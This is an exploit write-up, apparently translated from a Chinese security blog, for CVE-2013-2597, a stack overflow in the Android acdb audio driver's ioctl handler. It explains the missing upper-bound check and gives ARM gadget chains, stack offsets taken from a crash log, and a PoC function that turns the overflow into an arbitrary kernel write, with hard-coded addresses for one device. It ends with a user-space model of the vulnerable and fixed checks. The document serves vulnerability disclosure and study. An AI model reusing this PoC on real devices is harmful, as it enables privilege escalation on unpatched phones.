Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)

/*

This article was written by 莫灰灰 (Mo Huihui); please credit the source when reposting.

Author: 莫灰灰    Email: [email protected]

*/

1. Vulnerability description

The acdb audio driver exposes an ioctl system interface for user-space callers; however, it performs no effective bounds check on the parameters passed in. An application that can open the /dev/msm_acdb device file can use this to escalate privileges.

2. Vulnerability analysis

The original code is as follows:

if (size <= 0) {
	pr_err("%s: Invalid size sent to driver: %d\n",
		__func__, size);
	result = -EFAULT;
	goto done;
}

if (copy_from_user(data, (void *)(arg + sizeof(size)), size)) {
	pr_err("%s: fail to copy table size %d\n", __func__, size);
	result = -EFAULT;
	goto done;
}

When handling the ioctl, the acdb driver only checks the input size against size <= 0; it never checks the upper bound. The call that follows, copy_from_user(data, (void *)(arg + sizeof(size)), size), therefore overflows the local variable data on the stack.


3. Exploitation
1. Original flow: do_vfs_ioctl calls acdb_ioctl and then returns

do_vfs_ioctl:
STMPW [SP], { R4-R9, LR }
...
BL acdb_ioctl
...
ADD SP, SP, #$44 // (2)
LDMUW [SP], { R4-R9, PC } // (1)

2. A fragment of acdb_ioctl where control of PC can be obtained. The registers are loaded at (3); every value from R4 through PC can be controlled here.


acdb_ioctl:
...
ADD SP, SP, #$84
LDMUW [SP], { R4-R11, PC } // (3)

Through the stack overflow, modify the values of R5, R9 and PC.


3. With the instruction above, the stack overflow controls PC and jumps to the following code:

STR R5, [R9] // (4)
LDMUW [SP], { R4-R10, PC } // (5)

This is the crucial step: the STR instruction stores the value of R5 to the address held in R9, which turns the stack overflow into an arbitrary-address write.


4. After (5) executes, the stack must be padded with 4*8 bytes to keep it balanced; then the next PC is set so that execution returns to (2):

ADD SP, SP, #$24 // (6)
LDMUW [SP], { R4-R9, PC }

5. The actual stack position and the position of p->data have to be matched by hard-coded offsets.
The values in p->data[...] must be set at initialization time.
Work out the hard-coded addresses on a PC from the crash log.
Probe with p->data[i] = i (note: tagging each byte with its relative offset makes it easy to locate it on the stack). In this example, PC sits at &p->data[0x9c].

Example:
ACDB=> ACDB ioctl not found!
Unable to handle kernel paging request at virtual address 9f9e9d9c
pgd = df56c000
[9f9e9d9c] *pgd=00000000
Internal error: Oops: 80000005 [#1] PREEMPT SMP
Modules linked in:
CPU: 1 Tainted: G W (3.0.8+1.0.21100-02148-g79e6d0e #1)
PC is at 0x9f9e9d9c
LR is at acdb_ioctl+0x740/0x860
6. Set up the stack layout
*(unsigned int *)&p->data[0x80] = value;          // r5: PC - 4*7
*(unsigned int *)&p->data[0x90] = address;        // r9: PC - 4*3
*(unsigned int *)&p->data[0x9c] = address of (4); // pc: PC
*(unsigned int *)&p->data[0xbc] = address of (6); // pc: PC + 4*8

4. PoC

static int
write_value(const acdb_param *param, unsigned long address, unsigned long value)
{
    const char *device_name = "/dev/msm_acdb";
    struct acdb_ioctl arg;

    int fd;
    int ret;
    int i;

    fd = open(device_name, O_RDONLY);
    if (fd < 0) {
      ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));
      return -1;
    }

    arg.size = param->pc2.pos + 4;

    for (i = 0; i < arg.size; i += 4) {
      *(unsigned long int *)&arg.data[i] = i;
    }

    *(unsigned long int *)&arg.data[param->address_pos] = address; // R9
    *(unsigned long int *)&arg.data[param->value_pos] = value; // R5
    *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value;
    *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value;

    ret = ioctl(fd, 9999, &arg); // trigger any ioctl: the stack overflow fires and the arbitrary-address write happens
    close(fd);

    return 0;
}

The corresponding param values are:

{ DEVICE_SO05D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },

5. Vulnerability fix

An upper bound on size was added.
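To make the fix concrete, the following is an added user-space model of the two size checks; it is not the driver's code and not from the original article. The buffer length ACDB_DATA_LEN, the struct acdb_frame layout (buffer followed by the saved return address), the copy_from_user_sim helper and the sentinel value are all assumptions chosen for illustration. The vulnerable version mirrors the original check (only size <= 0 rejected) and lets a caller-controlled size overwrite the saved return address; the fixed version ties the upper bound to sizeof the buffer and rejects the same input.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the handler's local buffer; the driver's real value is not on the page. */
#define ACDB_DATA_LEN 64

/* Illustrative model of the handler's stack frame: the local buffer sits
 * directly below the saved return address that the epilogue pops into PC. */
struct acdb_frame {
    char data[ACDB_DATA_LEN];
    uint32_t saved_pc;
};

#define SAVED_PC_SENTINEL 0xc0ffee00u

/* User-space stand-in for copy_from_user(): 0 on success, non-zero on failure.
 * The destination is addressed through the whole frame so the model can show
 * what happens when the caller-controlled size exceeds the buffer, while the
 * simulation itself never writes outside the frame object. */
static int copy_from_user_sim(struct acdb_frame *f, const void *src, size_t n)
{
    if (n > sizeof(*f))
        return -1;
    memcpy((char *)f + offsetof(struct acdb_frame, data), src, n);
    return 0;
}

/* Vulnerable check, mirroring the original driver: only size <= 0 is rejected. */
int acdb_ioctl_vulnerable(struct acdb_frame *f, const void *user, int size)
{
    f->saved_pc = SAVED_PC_SENTINEL;
    if (size <= 0)
        return -EFAULT;
    if (copy_from_user_sim(f, user, (size_t)size))
        return -EFAULT;
    return 0;
}

/* Fixed check: the upper bound added by the patch, tied to sizeof the buffer. */
int acdb_ioctl_fixed(struct acdb_frame *f, const void *user, int size)
{
    f->saved_pc = SAVED_PC_SENTINEL;
    if (size <= 0 || (size_t)size > sizeof(f->data))
        return -EFAULT;
    if (copy_from_user_sim(f, user, (size_t)size))
        return -EFAULT;
    return 0;
}

/* 1 if the saved return address survived the copy, 0 if it was overwritten. */
int saved_pc_intact(const struct acdb_frame *f)
{
    return f->saved_pc == SAVED_PC_SENTINEL;
}

int main(void)
{
    /* Constructed input: more bytes than the buffer holds, all 'A'. */
    char user_buf[sizeof(struct acdb_frame)];
    struct acdb_frame f;
    int size = (int)sizeof(user_buf);
    memset(user_buf, 'A', sizeof(user_buf));

    int rv = acdb_ioctl_vulnerable(&f, user_buf, size);
    printf("vulnerable: rv=%d, saved_pc intact=%d (saved_pc=0x%08x)\n",
           rv, saved_pc_intact(&f), (unsigned)f.saved_pc);
    rv = acdb_ioctl_fixed(&f, user_buf, size);
    printf("fixed:      rv=%d, saved_pc intact=%d\n", rv, saved_pc_intact(&f));
    return 0;
}
```

The check that matters is `size > sizeof(f->data)`: it is expressed in terms of the destination buffer rather than a separately maintained constant, so the bound cannot drift if the buffer is resized later. Note also that the signed/unsigned comparison is done after the `size <= 0` test, so a negative size can never be widened into a huge unsigned length before the copy.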


References:
http://retme.net/index.php/2014/03/31/CVE-2013-2597-acdb.html
https://www.codeaurora.org/projects/security-advisories/stack-based-buffer-overflow-acdb-audio-driver-cve-2013-2597
https://gist.github.com/fi01/5857693

Date: 2024-10-11 13:25:02
